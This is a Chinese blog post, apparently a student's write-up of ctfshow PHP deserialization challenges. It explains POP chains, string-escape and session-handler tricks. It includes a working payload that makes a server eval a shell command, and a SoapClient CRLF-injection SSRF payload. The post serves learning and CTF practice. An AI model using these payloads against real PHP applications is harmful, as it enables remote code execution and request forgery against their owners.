<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="web 254:一道十分简单的反序列化，没有啥知识点。 web 255:和前一题大致相同，但是用hackerbar传cookie参数(手动传cookie参数的时候)要记得进行url编码，平时这一步是由浏览器帮我们完成的。 web 256:无新知识点 web 257:构造简单的pop链来完成命令执行。  部分源码如下： 12345678910111213141516171819202122232">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow web入门 反序列化">
<meta property="og:url" content="http://example.com/2021/03/10/%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="小川同学的blogs">
<meta property="og:description" content="web 254:一道十分简单的反序列化，没有啥知识点。 web 255:和前一题大致相同，但是用hackerbar传cookie参数(手动传cookie参数的时候)要记得进行url编码，平时这一步是由浏览器帮我们完成的。 web 256:无新知识点 web 257:构造简单的pop链来完成命令执行。  部分源码如下： 12345678910111213141516171819202122232">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-03-10T10:20:27.930Z">
<meta property="article:modified_time" content="2021-03-10T14:07:59.404Z">
<meta property="article:author" content="晚安">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2021/03/10/%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ctfshow web入门 反序列化 | 小川同学的blogs</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">小川同学的blogs</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">学习&生活</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/03/10/%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/OIP.jpg">
      <meta itemprop="name" content="晚安">
      <meta itemprop="description" content="冲！">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小川同学的blogs">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ctfshow web入门 反序列化
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-03-10 18:20:27 / 修改时间：22:07:59" itemprop="dateCreated datePublished" datetime="2021-03-10T18:20:27+08:00">2021-03-10</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <a id="more"></a>

<h3 id="web-254"><a href="#web-254" class="headerlink" title="web 254:"></a>web 254:</h3><p>一道十分简单的反序列化，没有啥知识点。</p>
<h3 id="web-255"><a href="#web-255" class="headerlink" title="web 255:"></a>web 255:</h3><p>和前一题大致相同，但是用hackerbar传cookie参数(手动传cookie参数的时候)要记得进行url编码，平时这一步是由浏览器帮我们完成的。</p>
<h3 id="web-256"><a href="#web-256" class="headerlink" title="web 256:"></a>web 256:</h3><p>无新知识点</p>
<h3 id="web-257"><a href="#web-257" class="headerlink" title="web 257:"></a>web 257:</h3><p>构造简单的pop链来完成命令执行。</p>
<blockquote>
<p>部分源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$username</span>=<span class="string">&#x27;xxxxxx&#x27;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$password</span>=<span class="string">&#x27;xxxxxx&#x27;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$class</span> = <span class="string">&#x27;info&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;class=<span class="keyword">new</span> info();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;username===<span class="variable">$u</span>&amp;&amp;<span class="keyword">$this</span>-&gt;password===<span class="variable">$p</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;class-&gt;getInfo();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">backDoor</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$code</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;code);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
</blockquote>
<p>通过构造一个含有backDoor类的ctfshowUser类来实现代码执行</p>
<blockquote>
<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>&#123;</span><br><span class="line">	<span class="keyword">private</span> <span class="variable">$class</span> = <span class="string">&#x27;backDoor&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    	<span class="keyword">$this</span>-&gt;class=<span class="keyword">new</span> backDoor();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">backDoor</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$code</span> = <span class="string">&#x27;system(&quot;cat `ls`&quot;);&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</blockquote>
<h3 id="web-258："><a href="#web-258：" class="headerlink" title="web 258："></a>web 258：</h3><p>正则过滤<code>/[oc]:\d+:/i</code>,只需要把<code>O:</code>替换成<code>O:+</code>即可</p>
<h3 id="web259："><a href="#web259：" class="headerlink" title="web259："></a>web259：</h3><p>用的是SoapCLient+CRLF的组合拳，一个很有意思的知识点，详情可以</p>
<blockquote>
<p>维护代理服务器和原始访问者 IP 地址。如果发送到 Cloudflare 的请求中不含现有的 <strong>X-Forwarded</strong></p>
<p><strong>For</strong> 标头，<strong>X-Forwarded-For</strong> 将具有与 <strong>CF-Connecting-IP</strong> 标头相同的值：</p>
<p>示例：X-Forwarded-For:203.0.113.1</p>
<p>如果发送到 Cloudflare 的请求中已存在 <strong>X-Forwarded-For</strong> 标头，则 Cloudflare 会将 HTTP 代理的 IP</p>
<p>地址附加到这个标头：</p>
<p>示例：X-Forwarded-For:203.0.113.1,198.51.100.101,198.51.100.102</p>
</blockquote>
<p>所以我么直接pop两次之后得到的ip始终是Cloudflare附加上去的ip而不是题目要求的127.0.0.1，所以外面需要绕过这玩意儿。</p>
<p>而当一个SoupClient的实例调用一个不存在的方法时，触发的__call魔术方法会向soapClient的location参数发送请求，请求内容(不太准确的说法，自行领会一下)为location后的第一个参数，而我们知道在http请求报头中，每一行行末是’\r\n’，而连续两个’\r\n’之后会进入请求正文部分，于是我们可以构造一个参数使得请求报文在中途被我们控制达到传递恶意参数的效果。</p>
<blockquote>
<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$target</span> = <span class="string">&#x27;http://127.0.0.1/flag.php&#x27;</span>;</span><br><span class="line">    <span class="variable">$post_string</span> = <span class="string">&#x27;token=ctfshow&#x27;</span>;</span><br><span class="line">    <span class="variable">$b</span> = <span class="keyword">new</span> SoapClient(<span class="literal">null</span>,<span class="keyword">array</span>(</span><br><span class="line">        <span class="string">&#x27;location&#x27;</span> =&gt; <span class="variable">$target</span>,</span><br><span class="line">        <span class="string">&#x27;user_agent&#x27;</span>=&gt;<span class="string">&#x27;wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded^^Content-Length: &#x27;</span>.(<span class="keyword">string</span>)strlen(<span class="variable">$post_string</span>).<span class="string">&#x27;^^^^&#x27;</span>.<span class="variable">$post_string</span>,</span><br><span class="line">        <span class="string">&#x27;uri&#x27;</span>=&gt; <span class="string">&quot;ssrf&quot;</span>)</span><br><span class="line">    );</span><br><span class="line">    <span class="variable">$a</span> = serialize(<span class="variable">$b</span>);</span><br><span class="line">    <span class="variable">$a</span> = str_replace(<span class="string">&#x27;^^&#x27;</span>,<span class="string">&quot;\r\n&quot;</span>,<span class="variable">$a</span>);</span><br><span class="line">    <span class="keyword">echo</span> urlencode(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</blockquote>
<h3 id="web260："><a href="#web260：" class="headerlink" title="web260："></a>web260：</h3><p>水题</p>
<h3 id="web261："><a href="#web261：" class="headerlink" title="web261："></a>web261：</h3><p>0解题</p>
<h3 id="web262："><a href="#web262：" class="headerlink" title="web262："></a>web262：</h3><p>考点：反序列化中对象的逃逸</p>
<p>原因：在将对象序列化之后，再对其中字符进行替换且导致被替换后字符串增长，因为仅仅是字符串增长但是描述该字符串长度的数值并未发生改变，而反序列化读取字符串的依据是该字符串长度的数值，故导致部分字符串逃逸出来</p>
<p>上面说的十分绕口难懂，所以举个例子：</p>
<blockquote>
<p>s:7:”example”;s:135:”fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck”;s:5:”token”;s:5:”admin”;}”</p>
</blockquote>
<p>这个玩意儿反序列化之后应该是$example=”fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck”;s:5:”token”;s:5:”admin”;}”</p>
<p>但由于题目将其中fuck替换为loveU，导致该字符串变成</p>
<blockquote>
<p>s:7:”example”;s:135:”loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU”;s:5:”token”;s:5:”admin”;}”</p>
</blockquote>
<p>此时反序列化就会得到</p>
<p>$example=”loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU”</p>
<p>$token=”admin”</p>
<p>所以说尾部的字符串从其中逃逸了出来。</p>
<h3 id="web263："><a href="#web263：" class="headerlink" title="web263："></a>web263：</h3><p>暂时没想通为什么打不通，但是先记录一下知识点——php session反序列化漏洞</p>
<p>session是会话的意思，开启session机制意味着在用户关闭网页之前它将始终与服务器保持同一会话。</p>
<p>会话开始之后，PHP 就会将会话中的数据设置到 <code>$_SESSION</code> 变量中。当 PHP 停止的时候，它会自动读取 <code>$_SESSION</code> 中的内容，并将其进行<code>序列化</code>， 然后发送给会话保存管理器来进行保存。</p>
<p>不同的会话保存管理器会使得session的储存格式不同</p>
<blockquote>
<table>
<thead>
<tr>
<th>处理器名称</th>
<th>存储格式</th>
</tr>
</thead>
<tbody><tr>
<td>php</td>
<td>键名 + 竖线 + 经过<code>serialize()</code>函数序列化处理的值</td>
</tr>
<tr>
<td>php_binary</td>
<td>键名的长度对应的 ASCII 字符 + 键名 + 经过<code>serialize()</code>函数序列化处理的值</td>
</tr>
<tr>
<td>php_serialize</td>
<td>经过serialize()函数序列化处理的<strong>数组</strong></td>
</tr>
</tbody></table>
</blockquote>
<blockquote>
<p>首先来看看<code>session.serialize_handler</code>等于 <code>php</code>时候的序列化结果，demo 如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">ini_set(<span class="string">&#x27;session.serialize_handler&#x27;</span>,<span class="string">&#x27;php&#x27;</span>);</span><br><span class="line">session_start();</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;session&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;session&#x27;</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>传入?session=xianzhi</p>
<p>序列化的结果为：<code>session|s:7:&quot;xianzhi&quot;;</code></p>
<p>再来看看<code>session.serialize_handler</code>等于 <code>php_binary</code>时候的序列化结果。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">ini_set(<span class="string">&#x27;session.serialize_handler&#x27;</span>,<span class="string">&#x27;php_binary&#x27;</span>);</span><br><span class="line">session_start();</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;sessionsessionsessionsessionsession&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;session&#x27;</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>序列化的结果为：<code>#sessionsessionsessionsessionsessions:7:&quot;xianzhi&quot;;</code></p>
<p>最后就是<code>session.serialize_handler</code>等于 <code>php_serialize</code>时候的序列化结果:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">ini_set(<span class="string">&#x27;session.serialize_handler&#x27;</span>,<span class="string">&#x27;php_serialize&#x27;</span>);</span><br><span class="line">session_start();</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;session&#x27;</span>] = <span class="variable">$_GET</span>[<span class="string">&#x27;session&#x27;</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>序列化的结果为：<code>a:1:&#123;s:7:&quot;session&quot;;s:7:&quot;xianzhi&quot;;&#125;</code></p>
</blockquote>
<p>问题会出在哪呢？当我们分别使用php和php_serialize时，被php_serialize读入的”|”本来是序列化值的一部分，但如果这个值被php用来解读，那么”|”将会成为键和值分隔的符号，从而发生错误。</p>
<p>但是我这道题做不出来，呜呜呜我是废物。</p>
<h3 id="web264："><a href="#web264：" class="headerlink" title="web264："></a>web264：</h3><p>和262基本一致。</p>
<h3 id="web265："><a href="#web265：" class="headerlink" title="web265："></a>web265：</h3><p>题目源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>:   2020-12-04 23:52:24</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by:   h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-05 00:17:08</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshowAdmin</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$token</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$t</span>,<span class="variable">$p</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;token=<span class="variable">$t</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;password = <span class="variable">$p</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;token===<span class="keyword">$this</span>-&gt;password;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$ctfshow</span> = unserialize(<span class="variable">$_GET</span>[<span class="string">&#x27;ctfshow&#x27;</span>]);</span><br><span class="line"><span class="variable">$ctfshow</span>-&gt;token=md5(mt_rand());</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$ctfshow</span>-&gt;login())&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在序列化之前使其中两个属性建立引用关系，序列化再反序列化之后依然是引用关系，借此来绕过判断。</p>
<h3 id="web266："><a href="#web266：" class="headerlink" title="web266："></a>web266：</h3><p>php://input读取数据，用bp来post过去。PHP大小写：函数名和类名不区分,变量名区分。</p>
<h3 id="web267-amp-268："><a href="#web267-amp-268：" class="headerlink" title="web267&amp;268："></a>web267&amp;268：</h3><p>yii反序列化漏洞，具体可以看<a target="_blank" rel="noopener" href="https://www.yiiframework.com/doc/guide/2.0/zh-cn/runtime-routing">这篇文章</a></p>
<p>剩下的题目都没做，因为我觉得我一时半会写不出来，还需要积累，记录一下知识点</p>
<p>1.yii框架的反序列化</p>
<p>2.laravel 5.7的反序列化rce</p>
<p>3.laravel 5.8的反序列化rce</p>
<p>4.ThinkPHP V5.1的反序列化rce</p>
<p>5.phar+条件竞争</p>
<p>6.python的反序列化</p>

    </div>

    
    
    
    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------结束啦!<i class="fa fa-paw"></i>感谢阅读!-------------</div>
    
</div>

      
    </div>

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/06/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="prev" title="ctfsho web入门 文件包含">
      <i class="fa fa-chevron-left"></i> ctfsho web入门 文件包含
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#web-254"><span class="nav-text">web 254:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web-255"><span class="nav-text">web 255:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web-256"><span class="nav-text">web 256:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web-257"><span class="nav-text">web 257:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web-258%EF%BC%9A"><span class="nav-text">web 258：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web259%EF%BC%9A"><span class="nav-text">web259：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web260%EF%BC%9A"><span class="nav-text">web260：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web261%EF%BC%9A"><span class="nav-text">web261：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web262%EF%BC%9A"><span class="nav-text">web262：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web263%EF%BC%9A"><span class="nav-text">web263：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web264%EF%BC%9A"><span class="nav-text">web264：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web265%EF%BC%9A"><span class="nav-text">web265：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web266%EF%BC%9A"><span class="nav-text">web266：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web267-amp-268%EF%BC%9A"><span class="nav-text">web267&amp;268：</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="晚安"
      src="/images/OIP.jpg">
  <p class="site-author-name" itemprop="name">晚安</p>
  <div class="site-description" itemprop="description">冲！</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:1507452902@qq.com" title="E-Mail → mailto:1507452902@qq.com" rel="noopener" target="_blank"><i class="fa fa-qq fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="晚安"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">晚安</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
